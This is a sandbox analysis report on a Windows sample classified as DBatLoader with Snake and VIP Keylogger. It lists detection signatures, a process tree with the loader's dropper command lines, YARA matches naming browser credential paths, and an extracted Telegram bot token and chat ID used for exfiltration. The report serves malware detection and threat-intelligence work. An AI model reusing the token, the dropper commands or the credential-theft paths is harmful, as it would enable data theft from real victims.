Edit tour

Windows Analysis Report
PWSW6GK3ZC.exe

Overview

General Information

Sample name:	PWSW6GK3ZC.exe renamed because original name is a hash value
Original sample name:	be2fa311c0f0bc777b15840c76d527fe.exe
Analysis ID:	1621685
MD5:	be2fa311c0f0bc777b15840c76d527fe
SHA1:	b4b1c5c4eb2fd90ab55c0412366395509e4c3b32
SHA256:	43d217bd9afb270a687f6eded8015879286c309abffe411c3af9bcc1805f340c
Tags:	exeuser-abuse_ch
Infos:

Detection

DBatLoader, Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DBatLoader

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

Allocates many large memory junks

Allocates memory in foreign processes

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Drops PE files to the user root directory

Drops PE files with a suspicious file extension

Joe Sandbox ML detected suspicious sample

Sample uses process hollowing technique

Sample uses string decryption to hide its real strings

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Sigma detected: Execution from Suspicious Folder

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Suspicious Program Location with Network Connections

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Deletes files inside the Windows folder

Detected non-DNS traffic on DNS port

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains more sections than normal

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Potentially Suspicious Rundll32 Activity

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

PWSW6GK3ZC.exe (PID: 5852 cmdline: "C:\Users\user\Desktop\PWSW6GK3ZC.exe" MD5: BE2FA311C0F0BC777B15840C76D527FE)

cmd.exe (PID: 6644 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\QzlvenpfF.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2504 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\\Qzlvenpf13.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

extrac32.exe (PID: 4268 cmdline: extrac32 /C /Y C:\\Windows\\System32\\rundll32.exe C:\\Users\\Public\\ndpha.pif MD5: 9472AAB6390E4F1431BAA912FCFF9707)

ndpha.pif (PID: 4196 cmdline: C:\\Users\\Public\\ndpha.pif zipfldr.dll,RouteTheCall C:\Windows \SysWOW64\svchost.pif MD5: 889B99C52A60DD49227C5E485A016679)

fpnevlzQ.pif (PID: 7100 cmdline: C:\Users\Public\Libraries\fpnevlzQ.pif MD5: C116D3604CEAFE7057D77FF27552C215)

Qzlvenpf.PIF (PID: 576 cmdline: "C:\Users\Public\Libraries\Qzlvenpf.PIF" MD5: BE2FA311C0F0BC777B15840C76D527FE)

fpnevlzQ.pif (PID: 1440 cmdline: C:\Users\Public\Libraries\fpnevlzQ.pif MD5: C116D3604CEAFE7057D77FF27552C215)

Qzlvenpf.PIF (PID: 1988 cmdline: "C:\Users\Public\Libraries\Qzlvenpf.PIF" MD5: BE2FA311C0F0BC777B15840C76D527FE)

fpnevlzQ.pif (PID: 4536 cmdline: C:\Users\Public\Libraries\fpnevlzQ.pif MD5: C116D3604CEAFE7057D77FF27552C215)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://blog.vincss.net/re016-malware-analysis-modiloader/ https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 https://isc.sans.edu/diary/Malspam+pushes+ModiLoader+DBatLoader+infection+for+Remcos+RAT/29896 https://kienmanowar.wordpress.com/2024/04/09/quicknote-phishing-email-distributes-warzone-rat-via-dbatloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "Telegram", "Bot Token": "7741549877:AAGvFhZZl3oxTcYaKtJFu52Jb5_V7o5wbi0", "Chat id": "1224745150"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7741549877:AAGvFhZZl3oxTcYaKtJFu52Jb5_V7o5wbi0", "Chat_id": "1224745150", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.3395334268.0000000030CC0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.3395334268.0000000030CC0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000007.00000002.3395334268.0000000030CC0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000002.3395334268.0000000030CC0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35164:$a1: get_encryptedPassword 0x35138:$a2: get_encryptedUsername 0x351fc:$a3: get_timePasswordChanged 0x35114:$a4: get_passwordField 0x3517a:$a5: set_encryptedPassword 0x34f47:$a7: get_logins 0x3071c:$a10: KeyLoggerEventArgs 0x306eb:$a11: KeyLoggerEventArgsEventHandler 0x3501b:$a13: _encryptedPassword
00000007.00000002.3395334268.0000000030CC0000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f3aa:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ea4d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ecaa:$a4: \Orbitum\User Data\Default\Login Data 0x3f689:$a5: \Kometa\User Data\Default\Login Data
00000007.00000002.3395334268.0000000030CC0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32ce2:$s1: UnHook 0x32c7e:$s2: SetHook 0x32cb7:$s3: CallNextHook 0x32c46:$s4: _hook
0000000D.00000002.3389703614.0000000021740000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.3389703614.0000000021740000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000D.00000002.3389703614.0000000021740000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000002.3358783454.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 F3 88 44 24 2B 88 44 24 2F B0 0A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0000000D.00000002.3389703614.0000000021740000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x36084:$a1: get_encryptedPassword 0x36058:$a2: get_encryptedUsername 0x3611c:$a3: get_timePasswordChanged 0x36034:$a4: get_passwordField 0x3609a:$a5: set_encryptedPassword 0x35e67:$a7: get_logins 0x3163c:$a10: KeyLoggerEventArgs 0x3160b:$a11: KeyLoggerEventArgsEventHandler 0x35f3b:$a13: _encryptedPassword
0000000D.00000002.3389703614.0000000021740000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x402ca:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f96d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3fbca:$a4: \Orbitum\User Data\Default\Login Data 0x405a9:$a5: \Kometa\User Data\Default\Login Data
0000000D.00000002.3389703614.0000000021740000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33c02:$s1: UnHook 0x33b9e:$s2: SetHook 0x33bd7:$s3: CallNextHook 0x33b66:$s4: _hook
0000000D.00000002.3385919948.00000000202A3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.3358705276.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 F3 88 44 24 2B 88 44 24 2F B0 0A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0000000D.00000002.3382807165.000000001F221000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000A.00000002.3381513831.000000001F500000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.3381513831.000000001F500000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000A.00000002.3381513831.000000001F500000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000A.00000002.3381513831.000000001F500000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x7634a:$a1: get_encryptedPassword 0x7631e:$a2: get_encryptedUsername 0x763e2:$a3: get_timePasswordChanged 0x762fa:$a4: get_passwordField 0x76360:$a5: set_encryptedPassword 0x7612d:$a7: get_logins 0x71902:$a10: KeyLoggerEventArgs 0x718d1:$a11: KeyLoggerEventArgsEventHandler 0x76201:$a13: _encryptedPassword
0000000A.00000002.3383592326.000000001F830000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.3383592326.000000001F830000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000A.00000002.3383592326.000000001F830000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000A.00000002.3383592326.000000001F830000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x36084:$a1: get_encryptedPassword 0x36058:$a2: get_encryptedUsername 0x3611c:$a3: get_timePasswordChanged 0x36034:$a4: get_passwordField 0x3609a:$a5: set_encryptedPassword 0x35e67:$a7: get_logins 0x3163c:$a10: KeyLoggerEventArgs 0x3160b:$a11: KeyLoggerEventArgsEventHandler 0x35f3b:$a13: _encryptedPassword
0000000A.00000002.3383592326.000000001F830000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x402ca:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f96d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3fbca:$a4: \Orbitum\User Data\Default\Login Data 0x405a9:$a5: \Kometa\User Data\Default\Login Data
0000000A.00000002.3383592326.000000001F830000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33c02:$s1: UnHook 0x33b9e:$s2: SetHook 0x33bd7:$s3: CallNextHook 0x33b66:$s4: _hook
00000007.00000002.3386753422.000000002DE20000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.3386753422.000000002DE20000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000007.00000002.3386753422.000000002DE20000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000002.3386753422.000000002DE20000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x7634a:$a1: get_encryptedPassword 0x7631e:$a2: get_encryptedUsername 0x763e2:$a3: get_timePasswordChanged 0x762fa:$a4: get_passwordField 0x76360:$a5: set_encryptedPassword 0x7612d:$a7: get_logins 0x71902:$a10: KeyLoggerEventArgs 0x718d1:$a11: KeyLoggerEventArgsEventHandler 0x76201:$a13: _encryptedPassword
00000007.00000001.2117355938.0000000000400000.00000040.00000001.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 F3 88 44 24 2B 88 44 24 2F B0 0A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0000000A.00000003.2241933938.000000001D925000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000003.2241933938.000000001D925000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000A.00000003.2241933938.000000001D925000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000A.00000003.2241933938.000000001D925000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x312e4:$a1: get_encryptedPassword 0x312b8:$a2: get_encryptedUsername 0x3137c:$a3: get_timePasswordChanged 0x31294:$a4: get_passwordField 0x312fa:$a5: set_encryptedPassword 0x310c7:$a7: get_logins 0x2c89c:$a10: KeyLoggerEventArgs 0x2c86b:$a11: KeyLoggerEventArgsEventHandler 0x3119b:$a13: _encryptedPassword
0000000D.00000002.3390557464.0000000021E90000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.3390557464.0000000021E90000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000D.00000002.3390557464.0000000021E90000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000D.00000002.3390557464.0000000021E90000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35164:$a1: get_encryptedPassword 0x35138:$a2: get_encryptedUsername 0x351fc:$a3: get_timePasswordChanged 0x35114:$a4: get_passwordField 0x3517a:$a5: set_encryptedPassword 0x34f47:$a7: get_logins 0x3071c:$a10: KeyLoggerEventArgs 0x306eb:$a11: KeyLoggerEventArgsEventHandler 0x3501b:$a13: _encryptedPassword
0000000D.00000002.3390557464.0000000021E90000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f3aa:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ea4d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ecaa:$a4: \Orbitum\User Data\Default\Login Data 0x3f689:$a5: \Kometa\User Data\Default\Login Data
0000000D.00000002.3390557464.0000000021E90000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32ce2:$s1: UnHook 0x32c7e:$s2: SetHook 0x32cb7:$s3: CallNextHook 0x32c46:$s4: _hook
00000007.00000002.3394138110.0000000030630000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.3394138110.0000000030630000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000007.00000002.3394138110.0000000030630000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000002.3394138110.0000000030630000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x36084:$a1: get_encryptedPassword 0x36058:$a2: get_encryptedUsername 0x3611c:$a3: get_timePasswordChanged 0x36034:$a4: get_passwordField 0x3609a:$a5: set_encryptedPassword 0x35e67:$a7: get_logins 0x3163c:$a10: KeyLoggerEventArgs 0x3160b:$a11: KeyLoggerEventArgsEventHandler 0x35f3b:$a13: _encryptedPassword
00000007.00000002.3394138110.0000000030630000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x402ca:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f96d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3fbca:$a4: \Orbitum\User Data\Default\Login Data 0x405a9:$a5: \Kometa\User Data\Default\Login Data
00000007.00000002.3394138110.0000000030630000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33c02:$s1: UnHook 0x33b9e:$s2: SetHook 0x33bd7:$s3: CallNextHook 0x33b66:$s4: _hook
0000000D.00000003.2350567700.000000001D29F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000003.2350567700.000000001D29F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000D.00000003.2350567700.000000001D29F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000D.00000003.2350567700.000000001D29F000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x352bc:$a1: get_encryptedPassword 0x35290:$a2: get_encryptedUsername 0x35354:$a3: get_timePasswordChanged 0x3526c:$a4: get_passwordField 0x352d2:$a5: set_encryptedPassword 0x3509f:$a7: get_logins 0x30874:$a10: KeyLoggerEventArgs 0x30843:$a11: KeyLoggerEventArgsEventHandler 0x35173:$a13: _encryptedPassword
0000000D.00000001.2319835034.0000000000400000.00000040.00000001.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 F3 88 44 24 2B 88 44 24 2F B0 0A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000007.00000003.2137425995.000000002C39F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000003.2137425995.000000002C39F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000007.00000003.2137425995.000000002C39F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000003.2137425995.000000002C39F000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3546c:$a1: get_encryptedPassword 0x35440:$a2: get_encryptedUsername 0x35504:$a3: get_timePasswordChanged 0x3541c:$a4: get_passwordField 0x35482:$a5: set_encryptedPassword 0x3524f:$a7: get_logins 0x30a24:$a10: KeyLoggerEventArgs 0x309f3:$a11: KeyLoggerEventArgsEventHandler 0x35323:$a13: _encryptedPassword
00000007.00000002.3390390312.000000002F0E3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.3358753276.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 F3 88 44 24 2B 88 44 24 2F B0 0A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0000000A.00000002.3391545361.0000000021F70000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.3391545361.0000000021F70000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000A.00000002.3391545361.0000000021F70000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000A.00000002.3391545361.0000000021F70000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35164:$a1: get_encryptedPassword 0x35138:$a2: get_encryptedUsername 0x351fc:$a3: get_timePasswordChanged 0x35114:$a4: get_passwordField 0x3517a:$a5: set_encryptedPassword 0x34f47:$a7: get_logins 0x3071c:$a10: KeyLoggerEventArgs 0x306eb:$a11: KeyLoggerEventArgsEventHandler 0x3501b:$a13: _encryptedPassword
0000000A.00000002.3391545361.0000000021F70000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f3aa:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ea4d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ecaa:$a4: \Orbitum\User Data\Default\Login Data 0x3f689:$a5: \Kometa\User Data\Default\Login Data
0000000A.00000002.3391545361.0000000021F70000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32ce2:$s1: UnHook 0x32c7e:$s2: SetHook 0x32cb7:$s3: CallNextHook 0x32c46:$s4: _hook
0000000A.00000002.3384637628.000000001FB37000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.3384637628.000000001FB37000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000D.00000002.3379158943.000000001EE70000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.3379158943.000000001EE70000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000D.00000002.3379158943.000000001EE70000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000A.00000002.3384637628.000000001FA31000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
